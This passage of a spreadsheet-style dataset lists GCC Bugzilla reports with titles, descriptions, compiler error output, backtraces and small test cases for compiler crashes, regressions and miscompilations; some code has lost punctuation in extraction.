with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccQku01D.out file please attach this to your bugreport.
make[2]: *** [modules/ocl/CMakeFiles/opencv_ocl.dir/src/imgproc.cpp.o] Error 1
make[1]: *** [modules/ocl/CMakeFiles/opencv_ocl.dir/all] Error 2
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>joao.m.santos.silva</t>
  </si>
  <si>
    <t>GCC-10039</t>
  </si>
  <si>
    <t>[macosx] gcc hangs at a c++-Constructor with switch -Os</t>
  </si>
  <si>
    <t>My source file hangs the compiler reliably when building for release using 100% of the processor for indefinite time. The code should be correct it builds on lots of other compilers (including gcc2) and platforms. I attached the zipped *.ii-file. Before the preprocessing I stripped everything unrelated out of the source file it hangs in the constructor at the very end.
Release:
Apple Computer Inc. GCC version 1175 based on gcc version 3.1 20020420 (prerelease)
Environment:
Mac OS X 10.2.4 December 2002 DevTools
How-To-Repeat:
/usr/bin/g++3 -c -arch ppc -fno-common -fpascal-strings -Os -Wmost -Wno-four-char-constants -Wno-unknown-pragmas -Wno-unused -mdynamic-no-pic hangtest.ii</t>
  </si>
  <si>
    <t>dixl</t>
  </si>
  <si>
    <t>GCC-28402</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Doubleword shifts implemented using word_mode libcalls</t>
  </si>
  <si>
    <t>On sh (and other targets with no variable shift):
    typedef unsigned long long ull
    ull foo (ull x int y) { return x &lt;&lt; y }
is implemented using several calls to the SImode shift
routines rather than one call to the DImode routine.
A similar problem affects constant shifts if the target
does not have a direct implementation.
3.4 did not have this problem it's a 4.x regression
introduced by my 2004-09-04 patch.</t>
  </si>
  <si>
    <t>GCC-43012</t>
  </si>
  <si>
    <t>[4.5 Regression][graphite] wrong code for -floop-strip-mine in 453.povray</t>
  </si>
  <si>
    <t>SPEC CPU2006 test 453.povray is miscompiled by GCC mainline on powerpc64-linux for -O2 -floop-strip-line with either -m32 or -m64.  Here's the function that is miscompiled I'll attach a complete executable testcase:
----------------------------------------------------
void
pre_init_tokenizer ()
{
  int i
  for (i = 0 i &lt; LAST_TOKEN i++)
    {
      Table[i] = i
      if (i &lt; FLOAT_FUNCT_TOKEN)
        Table[i] = FLOAT_FUNCT_TOKEN
      else
        {
          if (i &lt; VECTOR_FUNCT_TOKEN)
            Table[i] = VECTOR_FUNCT_TOKEN
          else
            {
              if (i &lt; COLOUR_KEY_TOKEN)
                Table[i] = COLOUR_KEY_TOKEN
            }
        }
    }
}
----------------------------------------------------
Array elements 51-63 and 89-101 are not assigned values when the code is compiled with -O2 -floop-strip-mine.
The testcase (and 453.povray) work with GCC 4.4.2 with those options so this is a regression in GCC 4.5.  The failure starts with this patch:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=154637
    r154637 | spop | 2009-11-25 05:30:35 +0000 (Wed 25 Nov 2009)</t>
  </si>
  <si>
    <t>GCC-43889</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression]: mmix-knuth-mmixware gcc.c-torture/execute/arith-rand.c -O3 -fomit-frame-pointer -funroll-loops</t>
  </si>
  <si>
    <t>I've triaged the following regressions to be introduced at revision r154688:
FAIL: gcc.c-torture/execute/arith-rand-ll.c execution  -O3 -fomit-frame-pointer -funroll-loops
FAIL: gcc.c-torture/execute/arith-rand-ll.c execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions
FAIL: gcc.c-torture/execute/arith-rand.c execution  -O3 -fomit-frame-pointer -funroll-loops
FAIL: gcc.c-torture/execute/arith-rand.c execution  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions
Looking through other reports that revision (including follow-ups) exposed latent bugs in other ports so it's not unlikely the case here as well.
Still I think it's reasonable to CC the author of that revision and marking this PR as middle-end at least until I've looked closer.</t>
  </si>
  <si>
    <t>GCC-80800</t>
  </si>
  <si>
    <t>UBSAN: yet another false positive</t>
  </si>
  <si>
    <t>gcc rev248130 x86_64
&gt; cat f.cpp
short var_29 = 26289
unsigned short var_48 = 20359
unsigned short var_80 = 21070
int foo() {
  return 72 * (var_48 * 8531 * (var_80 / var_29))
}
int main () {
  foo()
  return 0
}
&gt; g++ -fsanitize=undefined f.cpp
&gt; ./a.out
f.cpp:5:49: runtime error: signed integer overflow: 20359 * 614232 cannot be represented in type 'int'</t>
  </si>
  <si>
    <t>GCC-81151</t>
  </si>
  <si>
    <t>-Wmaybe-uninitialized in insn-emit.c</t>
  </si>
  <si>
    <t>Created attachment 41596
Test-case
Building current GCC with GCC 7.1 produces warning:
g++ insn-emit.ii -Wmaybe-uninitialized
insn-emit.c: In function â€˜rtx_def* gen_roundv16sf2(rtx rtx)â€™:
insn-emit.c:148125:14: warning: â€˜operands[2]â€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
     operand2 = operands[2]
     ~~~~~~~~~^~~~~~~~~~~~~
insn-emit.c: In function â€˜rtx_def* gen_roundv8sf2(rtx rtx)â€™:
insn-emit.c:148194:14: warning: â€˜operands[2]â€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
     operand2 = operands[2]
     ~~~~~~~~~^~~~~~~~~~~~~
insn-emit.c: In function â€˜rtx_def* gen_roundv4sf2(rtx rtx)â€™:
insn-emit.c:148263:14: warning: â€˜operands[2]â€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
     operand2 = operands[2]
     ~~~~~~~~~^~~~~~~~~~~~~
insn-emit.c: In function â€˜rtx_def* gen_roundv8df2(rtx rtx)â€™:
insn-emit.c:148332:14: warning: â€˜operands[2]â€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
     operand2 = operands[2]
     ~~~~~~~~~^~~~~~~~~~~~~
insn-emit.c: In function â€˜rtx_def* gen_roundv4df2(rtx rtx)â€™:
insn-emit.c:148401:14: warning: â€˜operands[2]â€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
     operand2 = operands[2]
     ~~~~~~~~~^~~~~~~~~~~~~
insn-emit.c: In function â€˜rtx_def* gen_roundv2df2(rtx rtx)â€™:
insn-emit.c:148470:14: warning: â€˜operands[2]â€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
     operand2 = operands[2]
     ~~~~~~~~~^~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>GCC-12804</t>
  </si>
  <si>
    <t>zone allocator is broken on 64bit</t>
  </si>
  <si>
    <t>See also the discussion starting at:
http://gcc.gnu.org/ml/gcc-patches/2003-10/msg02401.html
I tried to bootstrap on x86_64-linux-gnu using --with-gc=zone and
full checking (including GCAC) and get this ICE:
./xgcc -B./ -B/opt/gcc/3.4-devel/x86_64-suse-linux-gnu/bin/ -isystem
/opt/gcc/3.4-devel/x86_64-suse-linux-gnu/include -isystem
/opt/gcc/3.4-devel/x86_64-suse-linux-gnu/sys-include
-L/abuild/aj/builds/gcc/misc/gcc/../ld -O2 -DIN_GCC    -W -Wall -Wwrite-strings
-Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -I. -I.
-I/usr/src/aj/cvs/gcc/gcc -I/usr/src/aj/cvs/gcc/gcc/.
-I/usr/src/aj/cvs/gcc/gcc/../include   -g0 -finhibit-size-directive
-fno-inline-functions -fno-exceptions -fno-zero-initialized-in-bss
-fno-unit-at-a-time -fno-omit-frame-pointer -fno-asynchronous-unwind-tables \
   -c /usr/src/aj/cvs/gcc/gcc/crtstuff.c -DCRT_END \
  -o crtend.o
In file included from /usr/src/aj/cvs/gcc/gcc/tsystem.h:89
                 from /usr/src/aj/cvs/gcc/gcc/crtstuff.c:62:
/usr/include/stdlib.h:394: internal compiler error: in sweep_pages at
ggc-zone.c:1333
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [crtend.o] Error 1
Running gdb gives some more insight:
(gdb) r -fpreprocessed crtstuff.i -quiet -dumpbase crtstuff.c -mtune=k8
-auxbase-strip crtend.o -g0 -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -version -finhibit-size-directive -fno-inline-functions
-fno-exceptions -fno-zero-initialized-in-bss -fno-unit-at-a-time
-fno-omit-frame-pointer -fno-asynchronous-unwind-tables -o crtstuff.s
Starting program: /abuild/aj/builds/gcc/misc/gcc/cc1 -fpreprocessed crtstuff.i
-quiet -dumpbase crtstuff.c -mtune=k8 -auxbase-strip crtend.o -g0 -O2 -W -Wall
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -version
-finhibit-size-directive -fno-inline-functions -fno-exceptions
-fno-zero-initialized-in-bss -fno-unit-at-a-time -fno-omit-frame-pointer
-fno-asynchronous-unwind-tables -o crtstuff.s
Breakpoint 2 at 0x2a9569fc30
Breakpoint 3 at 0x2a9569ed00
GNU C version 3.4 20031027 (experimental) (x86_64-suse-linux-gnu)
        compiled by GNU C version 3.3.1 (SuSE Linux).
GGC heuristics: --param ggc-min-expand=0 --param ggc-min-heapsize=0
Breakpoint 1 fancy_abort (file=0xf98440 /usr/src/aj/cvs/gcc/gcc/ggc-zone.c
line=1333 function=0xf984c1 sweep_pages)
    at /usr/src/aj/cvs/gcc/gcc/diagnostic.c:584
584       internal_error (in %s at %s:%d function trim_filename (file) line)
(gdb) bt
#0  fancy_abort (file=0xf98440 /usr/src/aj/cvs/gcc/gcc/ggc-zone.c line=1333
function=0xf984c1 sweep_pages)
    at /usr/src/aj/cvs/gcc/gcc/diagnostic.c:584
#1  0x0000000000c8bfd8 in sweep_pages (zone=0x11895a0) at
/usr/src/aj/cvs/gcc/gcc/ggc-zone.c:1333
#2  0x0000000000c8c2a0 in ggc_collect_1 (zone=0x11895a0 need_marking=true) at
/usr/src/aj/cvs/gcc/gcc/ggc-zone.c:1401
#3  0x0000000000c8c3f9 in ggc_collect () at /usr/src/aj/cvs/gcc/gcc/ggc-zone.c:1472
#4  0x00000000004029f6 in yyparse () at c-parse.y:295
#5  0x000000000040d94c in c_parse_file () at c-parse.y:2834
#6  0x000000000047f827 in c_common_parse_file (set_yydebug=0) at
/usr/src/aj/cvs/gcc/gcc/c-opts.c:1226
#7  0x0000000000c3599a in compile_file () at /usr/src/aj/cvs/gcc/gcc/toplev.c:1836
#8  0x0000000000c3abb7 in do_compile () at /usr/src/aj/cvs/gcc/gcc/toplev.c:4689
#9  0x0000000000c3ac4f in toplev_main (argc=26 argv=0x7fbfffeec8) at
/usr/src/aj/cvs/gcc/gcc/toplev.c:4729
#10 0x00000000004a76cb in main (argc=26 argv=0x7fbfffeec8) at
/usr/src/aj/cvs/gcc/gcc/main.c:35
(gdb) up
#1  0x0000000000c8bfd8 in sweep_pages (zone=0x11895a0) at
/usr/src/aj/cvs/gcc/gcc/ggc-zone.c:1333
1333                    abort ()
(gdb) p p
$1 = (page_entry *) 0x123c130
(gdb) p *p
$2 = {next = 0x123c0f0 bytes = 4096 survived = 2 page = 0x2a95a2e000 
bytes_free = 6990 context_depth = 0 large_p = false 
  zone = 0x11895a0}
To reproduce on my x86-64 system:
- start with an empty directory
- configure with:
$ /usr/src/aj/cvs/gcc/configure  --prefix=/opt/gcc/3.4-devel --disable-nls
--enable-threads=posix --enable-clocale=gnu --enable-__cxa_atexit
--enable-shared --enable-languages=cc++adatreelangjavaf77objc
--enable-checking=misctreertlgcrtlflaggcac --with-gc=zone
--with-system-zlib x86_64-suse-linux-gnu
- make bootstrap</t>
  </si>
  <si>
    <t>GCC-19357</t>
  </si>
  <si>
    <t>ICE when long double argument arrives in general register</t>
  </si>
  <si>
    <t>struct f {
	float f[8]
}
void ftest(struct f arg1 long double arg2) {
}
causes
movxf.c: In function `ftest':
movxf.c:5: error: insn does not satisfy its constraints:
(insn 46 34 66 0 (set (reg:XF 134 f6)
        (reg:XF 116 r36 [ arg2 ])) 26 {*movxf_internal} (nil)
    (expr_list:REG_DEAD (reg:XF 116 r36 [ arg2 ])
        (nil)))
movxf.c:5: internal compiler error: in final_scan_insn at final.c:2359
This is appearantly due to only the fr-&gt;gr case being handled in the movxf expander.</t>
  </si>
  <si>
    <t>GCC-50085</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: g++.dg/opt/life1.C scan-assembler GLOBAL_OFFSET_TABLE on x86_64-apple-darwin10</t>
  </si>
  <si>
    <t>The change at revision 176090 changed g++.dg/opt/life1.C from unsupported i.e. with 
// { dg-do compile { target i?86-*-linux* x86_64-*-linux* } }
// { dg-require-effective-target ilp32 }
to unexpected failures i.e. with
// { dg-do compile { target { { i?86-*-* x86_64-*-* } &amp;&amp; ia32 } } }</t>
  </si>
  <si>
    <t>GCC-66432</t>
  </si>
  <si>
    <t>[4.9 Regression] libgomp.c/appendix-a/a.29.1.c -O2 -g: type mismatch between an SSA_NAME and its symbol</t>
  </si>
  <si>
    <t>Run src/libgomp/testsuite/libgomp.c/appendix-a/a.29.1.c with '--target_board unix/-O2/-g':
...
FAIL: libgomp.c/appendix-a/a.29.1.c (test for excess errors)
Excess errors:
src/libgomp/testsuite/libgomp.c/appendix-a/a.29.1.c:6:1: error: type mismatch between an SSA_NAME and its symbol
UNRESOLVED: libgomp.c/appendix-a/a.29.1.c compilation failed to produce executable
...
Without -g the testcase passes.</t>
  </si>
  <si>
    <t>GCC-36364</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3/4.4 Regression] Problem with -frepo</t>
  </si>
  <si>
    <t>template  struct A
{
  static void assign (C  }
}
template  struct B
{
  struct D
  {
    static const C terminal
    static unsigned long stor[]
    static D &amp;empty_rep ()
    {
      void *p = reinterpret_cast (
      return *reinterpret_cast (p)
    }
    void test (unsigned long n)
    {
      T::assign (this-&gt;refdata ()[n] terminal)
    }
    C *refdata () throw ()
    {
      return reinterpret_cast (this + 1)
    }
  }
  C *dataplus
  C *data () const { return dataplus }
  D *rep () const { return  }
  static D  }
  B () : dataplus (empty_rep ().refdata ()) { }
  ~B () { }
  void push_back (C c) { rep ()-&gt;test (10) }
}
template  const C B ::D::terminal = C ()
template  unsigned long B ::D::stor[64]
int
main ()
{
  B  &gt; s
  s.push_back ('a')
}
g++ -c -frepo d.C
g++ -frepo -o d{.o}
results in:
d.o: In function `B &gt;::D::test(unsigned long)':
d.C:(.text+0xc9): undefined reference to `B &gt;::D::terminal'
collect2: ld returned 1 exit status
3.4 worked fine.</t>
  </si>
  <si>
    <t>GCC-25815</t>
  </si>
  <si>
    <t>[4.1 regression] ext/pb_assoc/example/erase_if.cc execution test</t>
  </si>
  <si>
    <t>Last known to work with: Fri Dec 30 21:24:33 UTC 2005 (revision 109181M).
Known to fail with: Wed Jan 11 14:14:27 UTC 2006 (revision 109585M).
FAIL: ext/pb_assoc/example/erase_if.cc execution test
With the message in the .log being:
...
PASS: ext/pb_assoc/example/erase_if.cc (test for excess errors)
/home/hp/combined41/combined/libstdc++-v3/testsuite/ext/pb_assoc/example/erase_if.cc:89: void some_op_sequence(Cntnr) [with Cntnr\
 = pb_assoc::tree_assoc_cntnr pb_assoc::rb_tree_ds_tag pb_assoc::null_node_updator std::allocator&lt;ch\
ar&gt; &gt;]: Assertion `c.size() == 20' failed.^M
program stopped with signal 6.^M
FAIL: ext/pb_assoc/example/erase_if.cc execution test
There were changes to both the c++ and libstdc++ in this time-frame.
Let's start with blaming libstdc++ as component.</t>
  </si>
  <si>
    <t>GCC-40286</t>
  </si>
  <si>
    <t>mkinstalldirs in install-plugin target missing DESTDIR</t>
  </si>
  <si>
    <t>currently the install-plugin target creates directories in $(plugin_includedir).  this is broken wrt DESTDIR and causes a sandbox violation for us (we install into a sandboxed DESTDIR before merging with the live filesystem).  the attached patch was sent to gcc-patches but got no response so i'm filing a PR.
I don't have a copyright assignment but I'm thinking this counts as obvious.
https://bugs.gentoo.org/270558</t>
  </si>
  <si>
    <t>GCC-16131</t>
  </si>
  <si>
    <t>[4.0 Regression] internal compiler error: in create_tmp_var at gimplify.c:361</t>
  </si>
  <si>
    <t>Recent changes (&lt; 48 hours) on mainline cause GCC to ICE when compiling the
well-known test case from PR8361:
% gccvs  8361.ii generate.C: In member function `bool  
MODEL_GENERATOR::onlyOneUndefAtomGreaterThanUpperGuard(constAGGREGATEATOM&amp;
constGINTERPRET&amp;) const':
generate.C:3233: internal compiler error: in create_tmp_var at gimplify.c:361
(This testcase is http://gcc.gnu.org/bugzilla/attachment.cgi?id=4415&amp;action=view)</t>
  </si>
  <si>
    <t>GCC-61575</t>
  </si>
  <si>
    <t>[4.9 Regression] Bogus invalid initialization of reference of type 'const D&amp;' from expression of type ''</t>
  </si>
  <si>
    <t>Google ref: b/15094102
The following test compiles with gcc-4.8 and trunk fails with current gcc-4_9-branch:
/// -- cut ---
struct D
{
  const int 
  const int 
}
int Create (const D 
void fn1 ()
{
  Create ( { {} {} })
}
/// -- cut ---
gcc-svn-4_9-r211828/bin/gcc  -c -std=c++11 t.ii
gcc-svn-4_9-r211175/bin/gcc  -c -std=c++11  t.ii
t.ii: In function 'void fn1()':
t.ii:10:22: error: invalid initialization of reference of type 'const D&amp;' from expression of type ''
   Create ( { {} {} })
                      ^
t.ii:6:5: note: in passing argument 1 of 'int Create(const D&amp;)'
 int Create (const D 
     ^
The source is accepted by Clang and trunk (@r211826). It was rejected by
trunk in the past:
OK gcc-svn-r195189/bin/gcc
OK gcc-svn-r197259/bin/gcc
OK gcc-svn-r198246/bin/gcc
OK gcc-svn-r198956/bin/gcc
OK gcc-svn-r199779/bin/gcc
OK gcc-svn-r199793/bin/gcc
OK gcc-svn-r199956/bin/gcc
OK gcc-svn-r200178/bin/gcc
                            ... broke somewhere here
KO gcc-svn-r210292/bin/gcc
KO gcc-svn-r210629/bin/gcc
                            ... refixed somewhere here
OK gcc-svn-r211159/bin/gcc
OK gcc-svn-r211286/bin/gcc
OK gcc-svn-r211479/bin/gcc
OK gcc-svn-r211743/bin/gcc
OK gcc-svn-r211826/bin/gcc</t>
  </si>
  <si>
    <t>GCC-57783</t>
  </si>
  <si>
    <t>Silly instantiation of class template when using dependent type</t>
  </si>
  <si>
    <t>The following code fails to compile on GCC 4.4.7 while it succeeds on 3.3.6 4.5.3 4.6.3 4.6.4 and 4.7.3.
template 
struct Two {
  T1	a
  T2	b
  Two(const T1&amp; a_ const T2&amp; b_) : a(a_) b(b_) {}
  template 
  Two(const Two&amp; t) : a(t.a) b(t.b) {}
}
template 
Two	make_two(T1 a T2 b) {
  return Two(a b)
}
struct Empty {}
template 
struct Foo : Base {
  typedef bool	type
  Two	f()
}
template 
Two::type*&gt;
Foo::f() {
  return make_two(false (type*) 0)
}
int main()
{
  Foo().f()
  return 0
}
Apparently the instantiation mechanism somehow has trouble dealing with Foo::type and doesn't identify this with the exact type (bool).
The very curious fact is that the error message starts with:
  In instantiation of 'Foo':
which makes me wonder how comes GCC wants to instantiate a class template with some completely random parameter.
This seems to be fixed in later releases but I haven't been able to pinpoint the actual report and fix.  So I report that specific case just to be sure that problem won't resurrect in the future.</t>
  </si>
  <si>
    <t>ibugs</t>
  </si>
  <si>
    <t>GCC-53364</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] Wrong code generation</t>
  </si>
  <si>
    <t>On the following code minimized from a much larger program:
test.cpp
=====================
#include 
struct A
{
    int m_x
    explicit A(int x) : m_x(x) {}
    operator int() const { return m_x }
}
struct B : public A
{
 public:
    explicit B(int x)
	: A(x) {}
}
int data = 1
int main() {
    B b = B(10)
    b = std::min(b B(data))
    return int(b)
}
=================
Running: g++ -O2 -c test.cpp
With gcc version: g++ (Debian 4.7.0-8) 4.7.0
(which says it's built from r187339 on the gcc 4.7 branch).
On architecture: x86-64
The program ought to return 1 but instead it returns randomness. Running valgrind confirms that this program is using uninitialized values.
Testing with the debian gcc-snapshot package (trunk rev 187013) shows the same bug.
Testing with the debian gcc 4.6.3 package does not show the bug.
Using -O1 does not show the bug.
Using -O1 -fstrict-aliasing shows the bug.</t>
  </si>
  <si>
    <t>foom</t>
  </si>
  <si>
    <t>GCC-33192</t>
  </si>
  <si>
    <t>__imag operator drops side effects in subexpr</t>
  </si>
  <si>
    <t>GCC miscompiles this:
int bar()
void foo() {
  int X = __imag bar()
}
to not call bar.
-Chris</t>
  </si>
  <si>
    <t>GCC-21195</t>
  </si>
  <si>
    <t>SSE intrinsics not inlined sometimes.</t>
  </si>
  <si>
    <t>Under some conditions (generally if you upset the inlining heuristic ie by force
inlining something) SSE intrinsics don't get inlined and some truely horrible
code ensues the fix tinkering with params isn't much prettier.
Happened to me with various 4.x versions on x86 or x86-64.
silly testcase:
#include 
static __attribute__ ((always_inline)) bool bloatit(const __m128 a const __m128
b) {
	const __m128
		v0 = _mm_max_ps(ab)
		v1 = _mm_min_ps(ab)
		v2 = _mm_mul_ps(ab)
		v3 = _mm_div_ps(ab)
		g0 = _mm_or_ps(_mm_or_ps(_mm_or_ps(v0v1) v2) v3)
	return _mm_movemask_ps(g0)
}
bool finalblow(const __m128 a const __m128 b const __m128 c const __m128 d
const __m128 e const __m128 f) {
	return bloatit(ab) &amp; bloatit(cd) &amp; bloatit(ef) &amp; bloatit(ac) &amp; bloatit(bd)
}
int main() { return 0 }
At -O3 on x86-64-linux g++-4120050417 gets funky with:
0000000000400540 :
  400540:       mulps  %xmm1%xmm0
  400543:       retq
...
0000000000400550 :
  400550:       divps  %xmm1%xmm0
  400553:       retq
...
0000000000400560 :
  400560:       minps  %xmm1%xmm0
  400563:       retq
...
0000000000400570 :
  400570:       maxps  %xmm1%xmm0
  400573:       retq
...
0000000000400580 :
  400580:       orps   %xmm1%xmm0
  400583:       retq
...
0000000000400590 :
  400590:       movmskps %xmm0%eax
  400593:       retq
... only to conclude with this wonder
00000000004005b0 &lt;finalblow(float __vector float __vector float __vector
float __vector float __vector float __vector)&gt;:
  4005b0:       push   %rbx
  4005b1:       xor    %ebx%ebx
  4005b3:       sub    $0x1b0%rsp
  4005ba:       movaps %xmm20x180(%rsp)
  4005c2:       movaps %xmm30x170(%rsp)
  4005ca:       movaps %xmm40x160(%rsp)
  4005d2:       movaps %xmm50x150(%rsp)
  4005da:       movaps %xmm10x190(%rsp)
  4005e2:       movaps %xmm00x1a0(%rsp)
  4005ea:       callq  400550 
  4005ef:       movaps %xmm00x140(%rsp)
  4005f7:       movaps 0x190(%rsp)%xmm1
  4005ff:       movaps 0x1a0(%rsp)%xmm0
  400607:       callq  400540 
  40060c:       movaps 0x190(%rsp)%xmm1
  400614:       movaps %xmm00x130(%rsp)
  40061c:       movaps 0x1a0(%rsp)%xmm0
  400624:       callq  400560 
  400629:       movaps 0x190(%rsp)%xmm1
  400631:       movaps %xmm00x120(%rsp)
  400639:       movaps 0x1a0(%rsp)%xmm0
  400641:       callq  400570 
  400646:       movaps 0x120(%rsp)%xmm1
  40064e:       callq  400580 
  400653:       movaps 0x130(%rsp)%xmm1
  40065b:       callq  400580 
  400660:       movaps 0x140(%rsp)%xmm1
  400668:       callq  400580 
  40066d:       callq  400590 
  400672:       movaps 0x170(%rsp)%xmm1
etc...
As said earlier that's just one way to make that happen.
It would be a real plus if those intrinsics could be inconditionnaly inlined.</t>
  </si>
  <si>
    <t>GCC-81464</t>
  </si>
  <si>
    <t>[8 Regression] ICE in expand_omp_for_static_chunk at omp-expand.c:4236</t>
  </si>
  <si>
    <t>Starting from r247495 we ICE on:
$ gcc  /home/marxin/Programming/gcc/gcc/testsuite/gfortran.dg/matmul_15.f90 -O1 --param parloops-chunk-size=2 -ftree-parallelize-loops=2
during GIMPLE pass: ompexpssa
/home/marxin/Programming/gcc/gcc/testsuite/gfortran.dg/matmul_15.f90:28:0:
            sm = sm + sum(c)
internal compiler error: in expand_omp_for_static_chunk at omp-expand.c:4236
0xacdfd4 expand_omp_for_static_chunk
	../../gcc/omp-expand.c:4236
0xad70b6 expand_omp_for
	../../gcc/omp-expand.c:5840
0xad845a expand_omp
	../../gcc/omp-expand.c:7903
0xad8666 expand_omp
	../../gcc/omp-expand.c:7889
0xadae3d execute_expand_omp
	../../gcc/omp-expand.c:8127</t>
  </si>
  <si>
    <t>GCC-7731</t>
  </si>
  <si>
    <t>g++ issues erroneous warning: implicit typename is deprecated</t>
  </si>
  <si>
    <t>Compiler issues aforementioned warning regarding result_type and argument_type.
The complete warning is:
----- CUT -----
bug.c:8: warning: `typename pattern_map::pattern_match::result_type' is implicitly a typename
bug.c:8: warning: implicit typename is deprecated please see the documentation for details
bug.c:8: warning: `typename pattern_map::pattern_match::argument_type' is implicitly a typename
bug.c:8: warning: implicit typename is deprecated please see the documentation for details
----- CUT -----
Note that this warning is not issued if the class pattern_map is at file scope
and not within a template.
Release:
3.2
Environment:
System: Linux powerbook 2.4.18-rc4-benh #1 Mon Feb 25 23:23:12 PST 2002 ppc unknown
Architecture: ppc
host: powerpc-unknown-linux-gnu
build: powerpc-unknown-linux-gnu
target: powerpc-unknown-linux-gnu
configured with: /tmp/gcc-3.2/configure --prefix=/usr/local/packages/gcc-3.2 --enable-threads=posix --enable-languages=cc++ --disable-nls
How-To-Repeat:
Compile this code:
//----- CUT -----
#include 
template struct pattern_map : std::map {
	typedef typename std::map map_type
	typedef typename map_type::value_type value_type
	struct pattern_match : std::unary_function {
		result_type operator()( argument_type a ) const {
			return true
		}
	}
}
struct pattern_match : std::unary_function {
	result_type operator()( argument_type a ) const {
		return true
	}
}
main() {
	pattern_map p
}
//----- CUT -----</t>
  </si>
  <si>
    <t>GCC-78619</t>
  </si>
  <si>
    <t>[6/7/8 Regression] ICE in copy_reference_ops_from_ref at tree-ssa-sccvn.c:889</t>
  </si>
  <si>
    <t>Invalid code affects versions 5 6 and 7 at -Og -Os -O1 or higher.
$ cat z1.f90
function f(x) result(z)
   real :: x z
   z = sign(1.0 f)
end
$ cat z2.f90
real function f(x) result(z)
   real :: x
   z = sign(1.0 f)
end
$ gfortran-7-20161127 -O2 z1.f90
z1.f90:3:17:
    z = sign(1.0 f)
                 1
Warning: Non-RECURSIVE procedure 'f' at (1) is possibly calling itself recursively.  Declare it RECURSIVE or use '-frecursive'
z1.f90:4:0:
 end
internal compiler error: in copy_reference_ops_from_ref at tree-ssa-sccvn.c:889
0xe00f3b copy_reference_ops_from_ref
        ../../gcc/tree-ssa-sccvn.c:889
0xe02335 valueize_shared_reference_ops_from_ref
        ../../gcc/tree-ssa-sccvn.c:1528
0xe03aaa vn_reference_lookup(tree_node* tree_node* vn_lookup_kind vn_reference_s** bool)
        ../../gcc/tree-ssa-sccvn.c:2427
0xe068ad visit_reference_op_load
        ../../gcc/tree-ssa-sccvn.c:3557
0xe068ad visit_use
        ../../gcc/tree-ssa-sccvn.c:3897
0xe08e4b process_scc
        ../../gcc/tree-ssa-sccvn.c:4128
0xe08e4b extract_and_process_scc_for_name
        ../../gcc/tree-ssa-sccvn.c:4215
0xe08e4b DFS
        ../../gcc/tree-ssa-sccvn.c:4267
0xe096bd sccvn_dom_walker::before_dom_children(basic_block_def*)
        ../../gcc/tree-ssa-sccvn.c:4733
0x12f3162 dom_walker::walk(basic_block_def*)
        ../../gcc/domwalk.c:265
0xe0a4d2 run_scc_vn(vn_lookup_kind)
        ../../gcc/tree-ssa-sccvn.c:4844
0xdd9064 execute
        ../../gcc/tree-ssa-pre.c:5151</t>
  </si>
  <si>
    <t>GCC-60984</t>
  </si>
  <si>
    <t>[4.9 Regression] AIX: gcc-4.9.0 bootstrap fails in stage-2</t>
  </si>
  <si>
    <t>Created attachment 32693
Error output config.log config.status
/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0/./prev-gcc/xg++ -B/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0/./prev-gcc/ -B/usr/local/gcc-4.9.0/powerpc-ibm-aix6.1.0.0/bin/ -nostdinc++ -B/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0/prev-powerpc-ibm-aix6.1.0.0/libstdc++-v3/src/.libs -B/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0/prev-powerpc-ibm-aix6.1.0.0/libstdc++-v3/libsupc++/.libs  -I/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0/prev-powerpc-ibm-aix6.1.0.0/libstdc++-v3/include/powerpc-ibm-aix6.1.0.0  -I/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0/prev-powerpc-ibm-aix6.1.0.0/libstdc++-v3/include  -I/builds/gbgbuild/bld/gcc/gcc-4.9.0/libstdc++-v3/libsupc++ -L/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0/prev-powerpc-ibm-aix6.1.0.0/libstdc++-v3/src/.libs -L/builds/gbgbuild/bld/gcc/stbldap01/obj_stbldap01-4.9.0/prev-powerpc-ibm-aix6.1.0.0/libstdc++-v3/libsupc++/.libs -c   -g -O2 -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings   -DHAVE_CONFIG_H -I. -I. -I/builds/gbgbuild/bld/gcc/gcc-4.9.0/gcc -I/builds/gbgbuild/bld/gcc/gcc-4.9.0/gcc/. -I/builds/gbgbuild/bld/gcc/gcc-4.9.0/gcc/../include -I./../intl -I/builds/gbgbuild/bld/gcc/gcc-4.9.0/gcc/../libcpp/include -I/usr/local/lib32-static/include -I/usr/local/lib32-static/include -I/usr/local/lib32-static/include  -I/builds/gbgbuild/bld/gcc/gcc-4.9.0/gcc/../libdecnumber -I/builds/gbgbuild/bld/gcc/gcc-4.9.0/gcc/../libdecnumber/dpd -I../libdecnumber -I/builds/gbgbuild/bld/gcc/gcc-4.9.0/gcc/../libbacktrace    -o tree-ssa-address.o -MT tree-ssa-address.o -MMD -MP -MF ./.deps/tree-ssa-address.TPo /builds/gbgbuild/bld/gcc/gcc-4.9.0/gcc/tree-ssa-address.c
